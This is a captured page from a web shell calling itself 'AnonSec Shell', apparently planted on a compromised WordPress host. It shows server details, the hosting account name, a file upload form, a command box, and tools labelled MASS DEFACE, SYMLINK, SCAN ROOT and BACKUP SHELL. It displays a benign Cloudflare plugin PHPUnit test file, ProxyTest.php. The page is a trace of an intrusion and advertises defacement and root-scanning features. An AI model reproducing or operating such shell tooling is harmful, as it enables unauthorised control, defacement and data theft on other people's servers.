. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell
AnonSec Shell
Server IP : 172.67.135.14  /  Your IP : 216.73.216.209   [ Reverse IP ]
Web Server : LiteSpeed
System : Linux premium35.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User : lasanffc ( 2331)
PHP Version : 8.0.30
Disable Function : NONE
Domains : 1 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/lasanffc/public_html/wp-content/plugins/cloudflare/src/Test/WordPress/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/lasanffc/public_html/wp-content/plugins/cloudflare/src/Test/WordPress/ProxyTest.php
<?php

namespace CF\Test\WordPress;

use CF\Integration\DefaultIntegration;
use phpmock\phpunit\PHPMock;

class ProxyTest extends \PHPUnit\Framework\TestCase
{
    use PHPMock;

    protected $mockConfig;
    protected $mockDataStore;
    protected $mockLogger;
    protected $mockWordPressAPI;
    protected $mockWordPressClientAPI;
    protected $mockDefaultIntegration;
    protected $mockRequestRouter;

    public function setup(): void
    {
        $this->mockConfig = $this->getMockBuilder('CF\Integration\DefaultConfig')
            ->disableOriginalConstructor()
            ->getMock();
        $this->mockDataStore = $this->getMockBuilder('CF\WordPress\DataStore')
            ->disableOriginalConstructor()
            ->getMock();
        $this->mockLogger = $this->getMockBuilder('\Psr\Log\LoggerInterface')
            ->disableOriginalConstructor()
            ->getMock();
        $this->mockWordPressAPI = $this->getMockBuilder('CF\WordPress\WordPressAPI')
            ->disableOriginalConstructor()
            ->getMock();
        $this->mockWordPressClientAPI = $this->getMockBuilder('CF\WordPress\WordPressClientAPI')
            ->disableOriginalConstructor()
            ->getMock();
        $this->mockRequestRouter = $this->getMockBuilder('\CF\Router\RequestRouter')
            ->disableOriginalConstructor()
            ->getMock();
        $this->mockDefaultIntegration = new DefaultIntegration($this->mockConfig, $this->mockWordPressAPI, $this->mockDataStore, $this->mockLogger);

        $this->mockProxy = $this->getMockBuilder('\CF\WordPress\Proxy')
            ->setConstructorArgs(array($this->mockDefaultIntegration))
            ->setMethods(array('getJSONBody'))
            ->getMock();

        $this->mockProxy->setWordpressClientAPI($this->mockWordPressClientAPI);
        $this->mockProxy->setRequestRouter($this->mockRequestRouter);

        $mockHeader = $this->getFunctionMock('CF\WordPress', 'header');
    }

    public function testRunHandlesGet()
    {
        $_SERVER['REQUEST_METHOD'] = 'GET';
        $_GET['proxyURL'] = 'proxyUrl';
        $_GET['proxyURLType'] = 'proxyUrlType';
        $this->mockWordPressAPI->method('isCurrentUserAdministrator')->willReturn(true);
        $this->mockRequestRouter->expects($this->once())->method('route');
        $mockWPDie = $this->getFunctionMock('CF\WordPress', 'wp_die');
        $this->mockProxy->run();
    }

    public function testRunHandlesPost()
    {
        $_SERVER['REQUEST_METHOD'] = 'POST';
        $jsonBody = json_encode(array(
            'proxyURL' => 'proxyURL',
            'proxyURLType' => 'proxyURLType',
            'cfCSRFToken' => 'cfCSRFToken',
        ));
        $mockFileGetContents = $this->getFunctionMock('CF\WordPress', 'file_get_contents');
        $mockFileGetContents->expects($this->any())->willReturn($jsonBody);
        $mockWPVerifyNonce = $this->getFunctionMock('CF\WordPress', 'wp_verify_nonce');
        $mockWPVerifyNonce->expects($this->once())->willReturn(true);
        $this->mockWordPressAPI->method('isCurrentUserAdministrator')->willReturn(true);
        $this->mockRequestRouter->expects($this->once())->method('route');
        $mockWPDie = $this->getFunctionMock('CF\WordPress', 'wp_die');
        $this->mockProxy->run();
    }

    public function testIsCloudFlareCSRFTokenValidReturnsTrueForGet()
    {
        $this->assertTrue($this->mockProxy->isCloudFlareCSRFTokenValid('GET', null));
    }

    public function testCreateRequestGETProxyClient()
    {
        $url = 'testproxyurl.com';
        $proxyURL = 'proxyurl.com';
        $_SERVER['REQUEST_METHOD'] = 'GET';
        $_GET['proxyURL'] = $url;
        $_GET['proxyURLType'] = 'CLIENT';
        $jsonBody = json_encode(array(
            'proxyURL' => $proxyURL,
        ));

        $this->mockProxy->expects($this->once())->method('getJSONBody')->willReturn($jsonBody);

        $request = $this->mockProxy->createRequest();

        $parameters = $request->getParameters();
        $body = $request->getBody();
        $this->assertFalse(isset($parameters['proxyURL']));
        $this->assertFalse(isset($parameters['proxyURLType']));
        $this->assertFalse(isset($body['proxyURL']));
        $this->assertEquals(\CF\API\Client::ENDPOINT . $url, $request->getUrl());
    }

    public function testCreateRequestGETProxyPlugin()
    {
        $url = 'testproxyurl.com';
        $proxyURL = 'proxyurl.com';
        $_SERVER['REQUEST_METHOD'] = 'GET';
        $_GET['proxyURL'] = $url;
        $_GET['proxyURLType'] = 'PLUGIN';
        $jsonBody = json_encode(array(
            'proxyURL' => $proxyURL,
        ));

        $this->mockProxy->expects($this->once())->method('getJSONBody')->willReturn($jsonBody);

        $request = $this->mockProxy->createRequest();

        $parameters = $request->getParameters();
        $body = $request->getBody();
        $this->assertFalse(isset($parameters['proxyURL']));
        $this->assertFalse(isset($parameters['proxyURLType']));
        $this->assertFalse(isset($body['proxyURL']));
        $this->assertEquals(\CF\API\Plugin::ENDPOINT . $url, $request->getUrl());
    }

    public function testCreateRequestNonGET()
    {
        $proxyURL = 'proxyurl.com';
        $_SERVER['REQUEST_METHOD'] = 'POST';
        $jsonBody = json_encode(array(
            'proxyURL' => $proxyURL,
        ));

        $this->mockProxy->expects($this->once())->method('getJSONBody')->willReturn($jsonBody);

        $request = $this->mockProxy->createRequest();

        $parameters = $request->getParameters();
        $body = $request->getBody();
        $this->assertFalse(isset($parameters['proxyURL']));
        $this->assertFalse(isset($parameters['proxyURLType']));
        $this->assertFalse(isset($body['proxyURL']));
        $this->assertEquals($proxyURL, $request->getUrl());
    }
}

Anon7 - 2022
AnonSec Team